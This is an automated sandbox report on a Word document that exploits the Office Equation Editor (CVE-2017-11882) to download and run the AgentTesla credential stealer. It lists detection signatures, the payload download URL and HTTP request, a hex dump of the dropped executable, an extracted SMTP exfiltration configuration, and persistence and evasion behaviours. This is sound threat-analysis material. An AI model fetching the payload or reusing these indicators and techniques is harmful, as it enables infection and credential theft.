Analysis Report IMG_05412_868_21.docx

Overview

General Information

Sample Name: IMG_05412_868_21.docx
Analysis ID: 404303
MD5: 8832e0557e1b144bad206ed6d14d5c34
SHA1: 4b729d3262362a2ab3edab09ac1f625af8f5e0c1
SHA256: fbd1b454da7fecb92c40b9b2f74fc8fecae79340afdc011e7c0d6339fabdcfde
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Allocates memory in foreign processes
Creates an undocumented autostart registry key
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains no OLE stream with summary information
Document has an unknown application name
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://31.210.20.6/3/44444.exe Avira URL Cloud: Label: malware
Found malware configuration
Source: 11.2.tthxx.exe.400000.1.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "bigazz@sixjan.xyzH^i?T2&gWQ({sixjan.xyz"}
Multi AV Scanner detection for domain / URL
Source: http://31.210.20.6/3/44444.exe Virustotal: Detection: 6% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\44444[1].exe ReversingLabs: Detection: 40%
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe ReversingLabs: Detection: 40%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad\notpad.exe ReversingLabs: Detection: 40%
Source: C:\Users\user\tthxx.exe ReversingLabs: Detection: 40%
Multi AV Scanner detection for submitted file
Source: IMG_05412_868_21.docx Virustotal: Detection: 30% Perma Link
Source: IMG_05412_868_21.docx ReversingLabs: Detection: 37%

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\tthxx.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\tthxx.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\tthxx.exe Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\tthxx.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\tthxx.exe Code function: 4x nop then jmp 001ED4D2h 4_2_001ED1D8
Source: C:\Users\user\tthxx.exe Code function: 4x nop then jmp 001ED772h 4_2_001ED1D8
Source: C:\Users\user\tthxx.exe Code function: 4x nop then jmp 001ED4D2h 4_2_001ED334
Source: C:\Users\user\tthxx.exe Code function: 4x nop then jmp 001ED4D2h 4_2_001ED1D8
Source: C:\Users\user\tthxx.exe Code function: 4x nop then jmp 001ED772h 4_2_001ED1D8
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 31.210.20.6:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 31.210.20.6:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2022566 ET TROJAN Possible Malicious Macro EXE DL AlphaNumL 192.168.2.22:49167 -> 31.210.20.6:80
Source: Traffic Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 31.210.20.6:80
Source: Traffic Snort IDS: 2021245 ET TROJAN Possible Dridex Download URI Struct with no referer 192.168.2.22:49167 -> 31.210.20.6:80
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 May 2021 20:01:56 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24Last-Modified: Mon, 03 May 2021 22:54:49 GMTETag: "53d38-5c174d9438040"Accept-Ranges: bytesContent-Length: 343352Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 48 80 90 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 d2 04 00 00 4a 00 00 00 00 00 00 5e f0 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 f0 04 00 4b 00 00 00 00 00 05 00 2c 47 00 00 00 00 00 00 00 00 00 00 00 1e 05 00 38 1f 00 00 00 60 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 d0 04 00 00 20 00 00 00 d2 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2c 47 00 00 00 00 05 00 00 48 00 00 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 05 00 00 02 00 00 00 1c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 f0 04 00 00 00 00 00 48 00 00 00 02 00 05 00 e0 4a 00 00 24 2c 00 00 03 00 00 00 01 00 00 06 04 77 00 00 06 79 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 30 06 00 8c 00 00 00 00 00 00 00 1e 3a 05 00 00 00 dd 10 00 00 00 28 2f 00 00 06 38 f1 ff ff ff 26 dd 00 00 00 00 28 01 00 00 0a 14 fe 06 02 00 00 06 73 02 00 00 0a 6f 03 00 00 0a 20 b7 3e 6e 89 28 35 00 00 06 19 3a 36 00 00 00 26 20 81 3e 6e 89 28 35 00 00 06 17 8d 08 00 00 01 25 16 28 2d 00 00 06 a2 1a 3a 21 00 00 00 26 26 20 61 3e 6e 89 28 35 00 00 06 28 27 00 00 06 26 38 14 00 00 00 28 28 00 00 06 38 c1 ff ff ff 28 2a 00 00 06 38 d7 ff ff ff 2a 01 10 00 00 00 00 00 00 15 15 00 06 01 00 00 01 1b 30 04 00 dc 00 00 00 01 00 00 11 28 04 00 00 0a d0 02 00 00 02 28 05 00 00 0a 6f 06 00 00 0a 20 5e 3e 6e 89 28 35 00 00 06 28 07 00 00 0a 6f 08 00 00 0a 18 3a 06 00 00 00 26 38 06 00 00 00 0a 38 00 00 00 00 73 09 00 00 0a 1b 3a 1f 00 00 00 26 06 08 6f 0a 00 00 0a 08 6f 0b 00 00 0a 73 0c 00 00 0a 16 39 0c 00 00 00 26 38 0c 00 00 00 0c 38 dc ff ff ff 0d 38 00 00
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /3/44444.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 31.210.20.6Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4ABA8B27-B28F-4AE5-86AD-026C320EA73C}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /3/44444.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 31.210.20.6Connection: Keep-Alive
Source: tthxx.exe, 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: tthxx.exe, 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: tthxx.exe, 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp String found in binary or memory: http://mNVnNH.com
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0H
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0I
Source: tthxx.exe, 00000004.00000002.2246288441.0000000005780000.00000002.00000001.sdmp, tthxx.exe, 00000008.00000002.2246287601.00000000057C0000.00000002.00000001.sdmp, tthxx.exe, 0000000B.00000002.2346087548.0000000005D30000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: tthxx.exe, 00000004.00000002.2246288441.0000000005780000.00000002.00000001.sdmp, tthxx.exe, 00000008.00000002.2246287601.00000000057C0000.00000002.00000001.sdmp, tthxx.exe, 0000000B.00000002.2346087548.0000000005D30000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: tthxx.exe, 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: tthxx.exe String found in binary or memory: https://discord.com/
Source: tthxx.exe, 00000004.00000000.2125555578.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 00000008.00000002.2242647544.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 0000000B.00000000.2239632507.0000000000180000.00000002.00020000.sdmp String found in binary or memory: https://discord.com/2
Source: tthxx.exe, 00000004.00000000.2125555578.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 00000004.00000002.2242103851.0000000000C63000.00000004.00000020.sdmp, tthxx.exe, 00000008.00000002.2242647544.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 0000000B.00000000.2239632507.0000000000180000.00000002.00020000.sdmp String found in binary or memory: https://discord.com/6
Source: tthxx.exe, 00000004.00000000.2125555578.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 00000008.00000002.2242647544.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 0000000B.00000000.2239632507.0000000000180000.00000002.00020000.sdmp String found in binary or memory: https://discord.com/:
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: tthxx.exe, 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a window with clipboard capturing capabilities
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Window created: window name: CLIPBRDWNDCLASS Jump to behavior

System Summary:

barindex
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\tthxx.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\44444[1].exe Jump to dropped file
Abnormal high CPU Usage
Source: C:\Users\user\tthxx.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\tthxx.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\tthxx.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\tthxx.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\tthxx.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Detected potential crypto function
Source: C:\Users\user\tthxx.exe Code function: 4_2_001E7098 4_2_001E7098
Source: C:\Users\user\tthxx.exe Code function: 4_2_001E8BEE 4_2_001E8BEE
Source: C:\Users\user\tthxx.exe Code function: 4_2_001E0CA5 4_2_001E0CA5
Source: C:\Users\user\tthxx.exe Code function: 4_2_001E1D78 4_2_001E1D78
Source: C:\Users\user\tthxx.exe Code function: 4_2_001E55E0 4_2_001E55E0
Source: C:\Users\user\tthxx.exe Code function: 4_2_001E5EB0 4_2_001E5EB0
Source: C:\Users\user\tthxx.exe Code function: 4_2_001E07C8 4_2_001E07C8
Source: C:\Users\user\tthxx.exe Code function: 4_2_001EA07C 4_2_001EA07C
Source: C:\Users\user\tthxx.exe Code function: 4_2_001E2099 4_2_001E2099
Source: C:\Users\user\tthxx.exe Code function: 4_2_001E5298 4_2_001E5298
Source: C:\Users\user\tthxx.exe Code function: 4_2_001EA330 4_2_001EA330
Source: C:\Users\user\tthxx.exe Code function: 4_2_001E6E30 4_2_001E6E30
Source: C:\Users\user\tthxx.exe Code function: 4_2_001E1E2A 4_2_001E1E2A
Source: C:\Users\user\tthxx.exe Code function: 4_2_001EBF00 4_2_001EBF00
Source: C:\Users\user\tthxx.exe Code function: 4_2_001E9F90 4_2_001E9F90
Source: C:\Users\user\tthxx.exe Code function: 4_2_005E0048 4_2_005E0048
Source: C:\Users\user\tthxx.exe Code function: 4_2_005E0014 4_2_005E0014
Source: C:\Users\user\tthxx.exe Code function: 8_2_002E7098 8_2_002E7098
Source: C:\Users\user\tthxx.exe Code function: 8_2_002E8B80 8_2_002E8B80
Source: C:\Users\user\tthxx.exe Code function: 8_2_002E0CA5 8_2_002E0CA5
Source: C:\Users\user\tthxx.exe Code function: 8_2_002E1D78 8_2_002E1D78
Source: C:\Users\user\tthxx.exe Code function: 8_2_002E55E0 8_2_002E55E0
Source: C:\Users\user\tthxx.exe Code function: 8_2_002E5EB0 8_2_002E5EB0
Source: C:\Users\user\tthxx.exe Code function: 8_2_002E07C8 8_2_002E07C8
Source: C:\Users\user\tthxx.exe Code function: 8_2_002E900F 8_2_002E900F
Source: C:\Users\user\tthxx.exe Code function: 8_2_002EA07C 8_2_002EA07C
Source: C:\Users\user\tthxx.exe Code function: 8_2_002E2099 8_2_002E2099
Source: C:\Users\user\tthxx.exe Code function: 8_2_002E5298 8_2_002E5298
Source: C:\Users\user\tthxx.exe Code function: 8_2_002EA330 8_2_002EA330
Source: C:\Users\user\tthxx.exe Code function: 8_2_002E8BCA 8_2_002E8BCA
Source: C:\Users\user\tthxx.exe Code function: 8_2_002E1E2A 8_2_002E1E2A
Source: C:\Users\user\tthxx.exe Code function: 8_2_002E6E30 8_2_002E6E30
Source: C:\Users\user\tthxx.exe Code function: 8_2_002EBF00 8_2_002EBF00
Source: C:\Users\user\tthxx.exe Code function: 8_2_002E9F90 8_2_002E9F90
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Code function: 11_2_00257578 11_2_00257578
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Code function: 11_2_00251F40 11_2_00251F40
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Code function: 11_2_00256CA8 11_2_00256CA8
Document contains no OLE stream with summary information
Source: IMG_05412_868_21.docx OLE indicator has summary info: false
Document has an unknown application name
Source: IMG_05412_868_21.docx OLE indicator application name: unknown
Source: 44444[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: tthxx.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: notpad.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: tthxx.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.expl.evad.winDOCX@12/11@0/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$G_05412_868_21.docx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRCF01.tmp Jump to behavior
Source: IMG_05412_868_21.docx OLE document summary: title field not present or empty
Source: C:\Users\user\tthxx.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\tthxx.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\tthxx.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: IMG_05412_868_21.docx Virustotal: Detection: 30%
Source: IMG_05412_868_21.docx ReversingLabs: Detection: 37%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\tthxx.exe C:\Users\user\tthxx.exe
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\tthxx.exe C:\Users\user\tthxx.exe
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Users\user\tthxx.exe Process created: C:\Users\user\AppData\Local\Temp\tthxx.exe C:\Users\user\AppData\Local\Temp\tthxx.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\tthxx.exe C:\Users\user\tthxx.exe Jump to behavior
Source: C:\Users\user\tthxx.exe Process created: C:\Users\user\AppData\Local\Temp\tthxx.exe C:\Users\user\AppData\Local\Temp\tthxx.exe Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\tthxx.exe C:\Users\user\tthxx.exe Jump to behavior
Source: C:\Users\user\tthxx.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\tthxx.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: IMG_05412_868_21.docx Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Code function: 11_2_002543F5 push edi; ret 11_2_002543F6
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe Code function: 11_2_002543FF push esi; ret 11_2_00254407
Source: initial sample Static PE information: section name: .text entropy: 7.96408240927
Source: initial sample Static PE information: section name: .text entropy: 7.96408240927
Source: initial sample Static PE information: section name: .text entropy: 7.96408240927
Source: initial sample Static PE information: section name: .text entropy: 7.96408240927

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\tthxx.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad\notpad.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\tthxx.exe Jump to dropped file
Source: C:\Users\user\tthxx.exe File created: C:\Users\user\AppData\Local\Temp\tthxx.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\44444[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\tthxx.exe Jump to dropped file

Boot Survival:

barindex
Creates an undocumented autostart registry key
Source: C:\Users\user\tthxx.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup Jump to behavior
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\tthxx.exe Jump to dropped file
Stores files to the Windows start menu directory
